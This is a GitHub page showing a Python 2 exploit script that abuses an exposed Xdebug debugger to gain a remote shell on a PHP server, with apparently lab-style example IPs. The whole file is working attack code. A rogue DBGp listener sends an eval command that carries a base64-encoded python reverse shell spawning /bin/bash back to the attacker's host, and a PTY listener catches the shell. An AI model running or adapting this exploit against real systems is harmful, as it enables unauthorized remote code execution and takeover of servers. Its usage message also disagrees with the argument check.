-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathxdebug_RCE.py
205 lines (160 loc) · 5.98 KB
/
xdebug_RCE.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
#!/usr/bin/env python2
# -*- coding: utf-8 -*- ####################################################################################
# DESCRIPTION #
# Gives you a remote shell on php application by abuse xdebug. #
#############################################################################################################
import requests
import random
import signal
import termios
import select
import socket
import os
import fcntl
import base64
import sys
import socket
import time
import os
import json
import time
import urllib as ul
import SocketServer
from multiprocessing import Process
# Handler to exist cleanly on ctrl+C
def signal_handler(signal, frame):
print "\nYou pressed Ctrl+C!"
sys.exit()
signal.signal(signal.SIGINT, signal_handler)
class PTY:
def __init__(self, slave=0, pid=os.getpid()):
# apparently python GC's modules before class instances so, here
# we have some hax to ensure we can restore the terminal state.
self.termios, self.fcntl = termios, fcntl
# open our controlling PTY
self.pty = open(os.readlink("/proc/%d/fd/%d" % (pid, slave)), "rb+")
# store our old termios settings so we can restore after
# we are finished
self.oldtermios = termios.tcgetattr(self.pty)
# get the current settings se we can modify them
newattr = termios.tcgetattr(self.pty)
# set the terminal to uncanonical mode and turn off
# input echo.
newattr[3] &= ~termios.ICANON & ~termios.ECHO
# don't handle ^C / ^Z / ^\
newattr[6][termios.VINTR] = '\x00'
newattr[6][termios.VQUIT] = '\x00'
newattr[6][termios.VSUSP] = '\x00'
# set our new attributes
termios.tcsetattr(self.pty, termios.TCSADRAIN, newattr)
# store the old fcntl flags
self.oldflags = fcntl.fcntl(self.pty, fcntl.F_GETFL)
# fcntl.fcntl(self.pty, fcntl.F_SETFD, fcntl.FD_CLOEXEC)
# make the PTY non-blocking
fcntl.fcntl(self.pty, fcntl.F_SETFL, self.oldflags | os.O_NONBLOCK)
def read(self, size=8192):
return self.pty.read(size)
def write(self, data):
ret = self.pty.write(data)
self.pty.flush()
return ret
def fileno(self):
return self.pty.fileno()
def __del__(self):
# restore the terminal settings on deletion
self.termios.tcsetattr(self.pty, self.termios.TCSAFLUSH, self.oldtermios)
self.fcntl.fcntl(self.pty, self.fcntl.F_SETFL, self.oldflags)
class Shell:
def __init__(self, addr, bind=True):
self.bind = bind
self.addr = addr
if self.bind:
self.sock = socket.socket()
self.sock.bind(self.addr)
self.sock.listen(5)
def handle(self, addr=None):
addr = addr or self.addr
if self.bind:
sock, addr = self.sock.accept()
else:
sock = socket.socket()
sock.connect(addr)
# create our PTY
pty = PTY()
# input buffers for the fd's
buffers = [[sock, []], [pty, []]]
def buffer_index(fd):
for index, buffer in enumerate(buffers):
if buffer[0] == fd:
return index
readable_fds = [sock, pty]
data = " "
# keep going until something deds
while data:
# if any of the fd's need to be written to, add them to the
# writable_fds
writable_fds = []
for buffer in buffers:
if buffer[1]:
writable_fds.append(buffer[0])
r, w, x = select.select(readable_fds, writable_fds, [])
# read from the fd's and store their input in the other fd's buffer
for fd in r:
buffer = buffers[buffer_index(fd) ^ 1][1]
if hasattr(fd, "read"):
data = fd.read(8192)
else:
data = fd.recv(8192)
if data:
buffer.append(data)
# send data from each buffer onto the proper FD
for fd in w:
buffer = buffers[buffer_index(fd)][1]
data = buffer[0]
if hasattr(fd, "write"):
fd.write(data)
else:
fd.send(data)
buffer.remove(data)
# close the socket
sock.close()
def BuildPythonReverseShell():
python_rev_shell = '''python2 -c \'import pty,socket,os;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);\
s.connect(("%s", %s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash");s.close()\'''' % (LHOST, LPORT)
payload = 'echo %s|base64 -d|bash' % base64.b64encode(python_rev_shell)
return payload
def PayloadServer():
print("[+] Payload = 9000")
ip_port = ('0.0.0.0', 9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()
while True:
client_data = conn.recv(1024)
time.sleep(3)
payload = """system('%s');""" % BuildPythonReverseShell()
conn.sendall('eval -i 1 -- %s\x00' % payload.encode('base64'))
def Exploit():
time.sleep(5)
print("[+] Exploit")
requests.get("%s?XDEBUG_SESSION_START=test" % URL)
if __name__ == '__main__':
if len(sys.argv) != 4:
print "Usage: %s <URL> <LHOST> <LPORT> <USERNAME> <PASSWORD>" % (sys.argv[0])
print "\nEXAMPLE: ./xdebug_rce.py 'http://10.10.10.70/phpinfo.php' 10.10.14.24 1337\n"
sys.exit(0)
URL = sys.argv[1]
LHOST = sys.argv[2]
LPORT = sys.argv[3]
print "[+] LHOST = %s" % LHOST
print "[+] LPORT = %s" % LPORT
p = Process(target=PayloadServer)
p.start()
# Run exploit Async
p = Process(target=Exploit)
p.start()
# Start listener
print("[+] Shell listen")
s = Shell((LHOST, int(LPORT)), bind=True)
s.handle()